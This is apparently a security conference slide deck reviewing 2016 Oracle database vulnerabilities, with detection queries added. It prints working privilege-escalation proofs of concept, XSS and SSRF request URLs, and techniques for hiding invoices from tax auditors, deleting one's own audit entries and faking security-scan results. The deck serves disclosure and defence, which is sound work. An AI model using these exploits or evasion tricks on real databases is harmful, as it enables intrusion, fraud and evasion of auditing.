Best of Oracle Security 2016

The July 2016 Oracle CPU included 9 security fixes, 5 of which were remotely exploitable. One fix addressed an XSS vulnerability in the HTMLDB_UTIL package that could allow running arbitrary JavaScript code. Another fix addressed an APEX server-side request forgery issue that could enable port scanning or attacking systems on other ports. A third fix addressed an issue in the dbms_gsm_common package that allowed changing database parameters without admin privileges.

Best of Oracle Security 2016

What happened in 2016?

Oracle Backdoor & NSA

"Kaspersky report notes that somewhere in mid 2002 or 2003, Equation Group members (=NSA Hacker Team) used the Oracle database installation CD to infect multiple targets with malware from the group's extensive library." *

* http://www.techworm.net/2015/02/equation-group-nsa-backdoor-in-hardware-30-countries.html
Agenda

• Intro
• January 2016 - November 2016
• Outlook 2017
• Q&A

Introduction

What will be shown in the next 45 minutes?

• Oracle Security Patches
• Modify SQL statements & Application Logic
• Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU

The patch situation is getting better, but Oracle 12c offers a large, new playground (tons of new features) for security researchers.
Problem: just a few people are doing security research in the database.
Nearly 50% of the database vulnerabilities were found/reported by 2 researchers (David Litchfield & Alexander Kornbrust).

Oracle Vulnerabilities 2016

The number of vulnerabilities in the Oracle database is increasing again

• 30 findings in 2016 (2015: 29, 2014: 43, 2013: 13, 2012: 17)
• 8 remotely exploitable bugs (2015: 3, 2014: 4, 2013: 7, 2012: 8)

• January 2016 CPU (7 vulnerabilities – 0 remote)
• April 2016 CPU (5 vulnerabilities – 2 remote)
• July 2016 CPU (9 vulnerabilities – 5 remote)
• October 2016 CPU (9 vulnerabilities – 1 remote)
2016
January 2016

Oracle CPU January 2016 *
Exploiting the Oracle Workspace Manager SQL Race Condition (David Litchfield) **
DbDat (Database Assessment Tool) ***

* http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
** http://www.davidlitchfield.com/ExploitingtheOracleWorkspaceManagerSQLRaceCondition.pdf
*** https://github.com/foospidy/DbDat
January 2016 CPU*

7 security fixes (none remotely exploitable)
1 Java VM (CVSS 9.0)
1 Workspace Manager (CVSS 6.5)
2 XML Database (CVSS 5.5, 4.0)
1 Database Vault (CVSS 4.0)
1 Security (CVSS 4.0)
1 XML Developer's Kit (CVSS 4.0)

* http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
Jan 2016 CPU - CVE-2016-0467

Problem: Oracle native auditing fails to capture "Create Java Source"
Reporter: David Litchfield*
Exploit: obvious, Create Java Source…

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Jan 2016 CPU - CVE-2015-4921

Problem: Status is incorrectly reported if SYS auditing is used together with DB Vault
Reporter: David Litchfield*

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Jan 2016 CPU - CVE-2015-4925
Problem: Privilege escalation via race condition in WMSYS.LT.COPYFORUPDATE
Reporter: David Litchfield*

The Oracle Workspace Manager allows a user to version-enable database tables. This is achieved by creating workspaces which contain the versioned data. The Workspace Manager contains a number of PL/SQL packages that are used to manage workspaces. To function correctly some management actions must be performed with higher privileges than a normal user might have, and so to enable this, some of the management functions execute with the privileges of the WMSYS user. The main workspace manager interface is the LT PL/SQL package and this executes with the privileges of the user that calls or invokes LT. When privileged work is required to be executed, LT calls the LTADM package. The LTADM package executes with the privileges of the owner or definer, in this case WMSYS. WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER, which allows the grantee to create a trigger in any schema, with the exception of the SYS schema.

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Jan 2016 CPU - CVE-2015-4925

SELECT COUNT(*) INTO CNT
  FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD
 WHERE OC.SID = USER_SID AND
       […] AND
       OD.TO_TYPE IN (7,8,9,11);

Here, OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists then the user-supplied query will not be executed and an error is raised:

IF (CNT>0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF;

SQL_STR2 :=
  'declare
     delstatuses wmsys.ltUtil.number_tab;
   begin
     select WM_delstatus bulk collect into delstatuses
       from ' || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE') || '
      where WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update;
   end;';

WMSYS.LTADM.EXECSQL(SQL_STR2);
Jan 2016 CPU - CVE-2015-4925
SQL> CONNECT RACER/PASSWORD
SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));
SQL> INSERT INTO FOO (X) VALUES (1);
SQL> COMMIT;
SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO');

SQL> create or replace function Y return number authid current_user is
  pragma autonomous_transaction;
begin
  dbms_output.put_line('BANG!');
  execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
  execute immediate 'grant execute on owned to public';
  dbms_output.put_line(sys_context('userenv','current_user'));
  return 1;
end;
/

Jan 2016 CPU - CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;

SQL> create or replace procedure attempt_it is
begin
  execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'',''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
exception when others then null;
end;
/

SQL> declare
  i number:=0;
begin
  for i in 1..1000 loop
    execute immediate 'alter table RACER.RACER rename column Y to Z';
    execute immediate 'alter table RACER.RACER rename column Z to Y';
  end loop;
end;
/
Jan 2016 CPU - CVE-2015-4925

SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 P                              VARCHAR2                IN
February 2016

nothing special happened

March 2016

nothing special happened

April 2016

Oracle CPU April 2016*

* http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU*

5 security fixes (2 remotely exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3, 1 remote)

* http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, the following must also be added:

AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;*

Reporter: David Litchfield*

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
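To verify that the statement audit option recommended above is actually in place, and to see what a failed privileged call looks like in the trail afterwards, here is an added example; it is not taken from David Litchfield's advisory or from this presentation. It assumes traditional (non-unified) auditing with AUDIT_TRAIL set to DB or DB,EXTENDED and a DBA session. Return code 1031 in DBA_AUDIT_TRAIL corresponds to ORA-01031, the error that shows up in several of the demos later in this deck, so a burst of such rows against SYS objects is a useful signal even when the attempt itself failed.

```sql
-- Added example (not from the presentation). Traditional auditing, run as a DBA.

-- Audit failed EXECUTE attempts per statement rather than per session, as
-- recommended above, so probing for executable procedures leaves one row per try.
AUDIT EXECUTE PROCEDURE BY ACCESS WHENEVER NOT SUCCESSFUL;

-- Also record changes to the trail itself (cf. "remove your own audit entries"
-- later in this deck); the trail must stay trustworthy for the SIEM pull.
AUDIT DELETE, UPDATE ON sys.aud$ BY ACCESS;

-- Verify: the FAILURE column should read 'BY ACCESS' for EXECUTE PROCEDURE.
SELECT user_name, audit_option, success, failure
  FROM dba_stmt_audit_opts
 WHERE audit_option = 'EXECUTE PROCEDURE';

-- Hunt: failed calls ending in ORA-01031 (returncode 1031) during the last day,
-- grouped so that one account trying many privileged objects stands out.
SELECT username, os_username, owner, obj_name, action_name,
       COUNT(*)       AS failures,
       MIN(timestamp) AS first_seen,
       MAX(timestamp) AS last_seen
  FROM dba_audit_trail
 WHERE returncode = 1031
   AND timestamp > SYSDATE - 1
 GROUP BY username, os_username, owner, obj_name, action_name
 ORDER BY failures DESC;
```

The AUDIT statements take effect for new sessions; run the verification query afterwards and keep the expected output (FAILURE = 'BY ACCESS') as part of the hardening baseline.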
Apr 2016 CPU - CVE-2016-0691
Problem: If a "missing" (due to no execute privilege) function is used within a SELECT query, the name of the function is not logged, only the name of the table in the query.
Reporter: David Litchfield*
Exploit: obvious, Create Java Source…

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
May 2016

Nothing special happened


June 2016

Nothing special happened


July 2016

Oracle CPU July 2016 *

* http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU*
9 security fixes (5 remotely exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8, 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)

* http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it the schema (APEX_050000) needs to be specified first; this works because the config file whitelists apex*.
Reporter: David Litchfield*
Exploit:

http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Jul 2016 CPU - CVE-2016-3467
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether "allowed URLs" have been configured. For example, the request below will connect to "someotherserver" on the given port and POST X as a payload. This can be used as a port-scanning mechanism, to attack systems protected by a firewall, etc.
Reporter: David Litchfield*
Exploit:

http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Jul 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows a database parameter to be changed without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:

exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name,value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';

O7_DICTIONARY_ACCESSIBILITY FALSE

-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')

PL/SQL-Prozedur erfolgreich abgeschlossen.

-- as user SYS: re-run the query after execution of the package
SQL> select name,value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';

O7_DICTIONARY_ACCESSIBILITY TRUE


July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust

Problem: (Details + Exploit later….)

FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function-based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489

-- Oracle 11.2.0.4
SYSTEM@SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE!=OWNER and owner='SYS';

GRANTEE                        OWNER TABLE_NAME
--------------------------------------------------------------------------------------
SYSTEM                         SYS   INCEXP
SYSTEM                         SYS   INCFIL
SYSTEM                         SYS   INCVID

SYSTEM@SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN 'FOO';
END;
/

SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function-based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));

Index created.

SQL> select count(*) from sys.link$;

  COUNT(*)
----------
        11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA('1'))
*
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS

CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN 'FOO';
END;
/

SQL> grant execute on wmsys.getdba to public;

-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield*

* Presentation + supporting documents

https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf

https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
• Nothing special happened
October 2016

Oracle CPU October 2016 *

* http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU*

9 security fixes (1 remotely exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)

* http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust

Oracle Password Hash 12.1.0.2+

Oracle 12.1.0.2 introduced a new PBKDF2/SHA512-based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time-consuming to crack than the new Oracle PBKDF2.

Oracle Password Hash 12.1.0.2+

Let's have a look at RFC 2617:

KD(secret, data) = H(concat(secret, ":", data))

No salt, but a secret. With Secret = 'XDB' the hash will be

MD5(XDB:tiger)

and it is stored in the spare4 column, prefixed with H:
Oct 2016 CPU - CVE-2016-5516

Problem: In Oracle 12c, the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user.

The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and, as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12/13)
Reporter: Alexander Kornbrust

sqlplus sysman_apm/rdsora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist

==> user does not have the privilege to access DBA_USERS

SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN 'FOO';
END;
/

==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function-based index (FBI). The function getdba is used for the function-based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';

GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
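Both function-based-index escalations in this deck (CVE-2016-3489 against SYS.INCVID, CVE-2016-5604 against SYSTEM.HELP) need the same ingredients: an INDEX grant or CREATE ANY INDEX on a table owned by a more privileged schema, and an invoker-rights function that PUBLIC may execute. The dictionary queries below enumerate those ingredients so a DBA can review them after applying the CPU. This is an added example, not part of the presentation; it assumes a DBA account on 11.2 or 12.1 and uses only standard data dictionary views, and the grantee exclusion list is an assumption to be tuned per database.

```sql
-- Added example (not from the presentation). Run as a DBA on 11.2 or later.
-- Each query lists one precondition of the FBI escalations shown above.

-- 1. Object privilege INDEX on SYS/SYSTEM tables held by another user.
--    This is what let SYSTEM build EXPLOIT_INDEX on SYS.INCVID on 11.2.0.4.
SELECT grantee, owner, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
 ORDER BY owner, table_name, grantee;

-- 2. System privileges with the same reach: CREATE ANY INDEX (SYSMAN_APM, WMSYS),
--    CREATE ANY PROCEDURE (used on 12.1.0.2 to plant GETDBA in WMSYS) and
--    INHERIT ANY PRIVILEGES (what SYSTEM lost in 12.1.0.2).
--    The grantee exclusion list is an assumption; tune it to your database.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE',
                     'INHERIT ANY PRIVILEGES')
   AND grantee NOT IN ('SYS', 'DBA')
 ORDER BY privilege, grantee;

-- 3. Invoker-rights PL/SQL outside SYS that PUBLIC may execute: the GETDBA pattern
--    (AUTHID CURRENT_USER + GRANT EXECUTE ... TO PUBLIC).
SELECT p.owner, p.object_name, p.object_type, p.authid
  FROM dba_procedures p
  JOIN dba_tab_privs t
    ON t.owner = p.owner AND t.table_name = p.object_name
 WHERE p.authid = 'CURRENT_USER'
   AND p.procedure_name IS NULL            -- one row per standalone unit / package
   AND p.object_type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE')
   AND t.grantee = 'PUBLIC'
   AND t.privilege = 'EXECUTE'
   AND p.owner <> 'SYS'
 ORDER BY p.owner, p.object_name;

-- 4. Every function-based index expression on a SYS or SYSTEM table, plus any index
--    on those tables owned by another schema. Review the expressions for calls into
--    other schemas (SYSTEM.GETDBA, WMSYS.GETDBA, SYSMAN_APM.GETDBA above).
SELECT index_owner, index_name, table_owner, table_name, column_expression
  FROM dba_ind_expressions
 WHERE table_owner IN ('SYS', 'SYSTEM')
    OR index_owner <> table_owner
 ORDER BY table_owner, table_name, index_name;

-- 5. Once nothing legitimate is found to depend on them, grants from (1) can be
--    withdrawn; shown for the 11.2.0.4 case on the slides.
-- REVOKE INDEX ON sys.incvid FROM system;
```

Queries 1 and 4 are worth scheduling: a new row in either one after the baseline is taken is exactly the footprint the two CVEs leave behind, and it is visible even when the function itself has already been dropped, because the index stays.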
November 2016

DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you:

"Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10.000 EUR invoice from the last party at the night club just from the auditor? I will increase your salary…."
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC

Scenario 3
You don't have time to harden all your databases, but the security department wants to see results.
Instead of fixing the problem you will just deliver the proper results.

A lot of different wishes…

but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…

All these scenarios have in common that we have to manipulate the SQL statement:

Select value …

Oracle Data Redaction allows the DBA to mask / manipulate the selected data just for a single database user.
Possible usage:
replace true/false
replace USER/ADMIN
the DBA can decide what will be returned
Select value …

A typical query from security checklists/scanners looks like this:

select upper(value) from parameter where upper(name) = 'XYZ';

The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.

==> The audit department is happy because the database passes all the security checks…
… from table/view …

Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare!='DBA1' to the view dba_audit_trail). All entries of the OSUSER DBA1 will be removed in the view. If a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view / INSTEAD OF trigger
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL

-- dbms_macadm
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user!='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y

where conditions can be changed using VPD

VPD: add where clause
invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department

Select value from table/view where x=y

SQL Translation Framework (12c only) allows an entire query to be replaced:
User submits Query A
SQL Translation Framework replaces Query A with Query B
Possible Countermeasures for paranoid Auditors

Add a random string, e.g. /* aksdjhiuz */, to avoid the SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
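The countermeasures above can be turned into a short review script. The queries below are an added example and not part of the presentation; they assume a DBA session on 12.1 or later (REDACTION_POLICIES and DBA_SQL_TRANSLATION_PROFILES do not exist in 11g), that the session has EXECUTE on DBMS_CRYPTO, and the trusted-schema list in query 2 is an assumption to be adjusted. Each query lists something that has to be empty, or match a known-good value, before the result of a query can be trusted.

```sql
-- Added example (not from the presentation). Run as a DBA on 12.1 or later.

-- 1. Object type check: DUAL must be exactly one SYS table plus one PUBLIC synonym
--    pointing at it (the MYDUAL trick above swaps the synonym).
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL';

SELECT owner, synonym_name, table_owner, table_name
  FROM dba_synonyms
 WHERE synonym_name = 'DUAL'
   AND NOT (table_owner = 'SYS' AND table_name = 'DUAL');   -- expected: no rows

-- 2. Redirected public synonyms: anything resolving outside a trusted schema, or
--    dangling. The trusted list is an assumption; extend it for your database.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
    ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC'
   AND (o.object_type IS NULL
        OR s.table_owner NOT IN ('SYS','SYSTEM','XDB','CTXSYS','MDSYS','WMSYS',
                                  'DBSNMP','OUTLN','ORDSYS','OLAPSYS','DVSYS'))
 ORDER BY s.synonym_name;

-- 3. Features that rewrite a query or its result on the fly.
SELECT object_owner, object_name, policy_name, pf_owner, package, enable
  FROM dba_policies                       -- VPD: extra WHERE conditions
 ORDER BY object_owner, object_name;

SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies;               -- Data Redaction: altered column values

SELECT owner, profile_name
  FROM dba_sql_translation_profiles;     -- SQL Translation Framework: replaced query

-- 4. Who may bypass VPD, and is this session really in its own schema?
SELECT grantee FROM dba_sys_privs WHERE privilege = 'EXEMPT ACCESS POLICY';

SELECT sys_context('userenv', 'session_user')   AS logged_in_as,
       sys_context('userenv', 'current_schema') AS schema_in_effect
  FROM sys.dual;                         -- fully qualified on purpose

-- 5. Checksum of a view definition for comparison with a known-good baseline
--    (catches an added predicate such as the spare!='DBA1' example above).
--    DBMS_CRYPTO hash type 4 is HASH_SH256; DBMS_METADATA.GET_DDL returns a CLOB.
SELECT RAWTOHEX(DBMS_CRYPTO.HASH(
         DBMS_METADATA.GET_DDL('VIEW', 'DBA_AUDIT_TRAIL', 'SYS'), 4)) AS view_sha256
  FROM sys.dual;
```

Queries 1, 2 and 4 should return the same thing on every run; 3 and 5 are compared against a baseline taken right after installation, and any new policy, profile or changed view hash is a question for the DBA before the audit data is believed.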
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors/Security Departments should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use

Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions

Q&A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
